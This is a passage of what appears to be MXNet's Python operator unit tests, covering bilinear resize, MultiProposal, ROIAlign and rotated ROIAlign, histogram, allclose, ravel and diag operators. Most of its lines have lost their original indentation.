check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
@with_seed()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
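        # MultiProposal over a whole batch should match running Proposal
        # independently on each image of the batch.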
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
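            # analytic gradient: d/dx (a*x**2 + b*x + c) = 2*a*x + b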
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements of the array that are considered "not close" on this side,
                    # together with the corresponding elements of the comparison (CPU/GPU/Python)
                    # vectors that are considered "close".
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
                    # Find the indices of all violations and their corresponding coordinate values
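                    # numpy.isclose treats a and b as "close" when |a - b| <= atol + rtol * |b|;
                    # the mask below flags every element violating that bound.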
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                    idx = np.argwhere(bad_indexes)
                    idx_flat = np.flatnonzero(bad_indexes)
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
        # Disable the subgraph backend in case it would replace the symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
        # Disable the subgraph backend in case it would replace the symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
    # Be aware that check_symbolic_forward uses a float type internally for the
    # arrays, which limits the representable flat-index range. Taking dim==4 and
    # a data range of [0, 100] can already cause precision issues and break this
    # test.
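    # (float32 has a 24-bit significand, so integers above 2**24 = 16777216 lose exactness,
    # e.g. np.float32(2**24) + np.float32(1) == np.float32(2**24); with dim==4 and values up
    # to 100 the flat index can reach roughly 1e8, well beyond that limit.)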
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA is sometimes unable to determine the
        # number of GPUs.
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
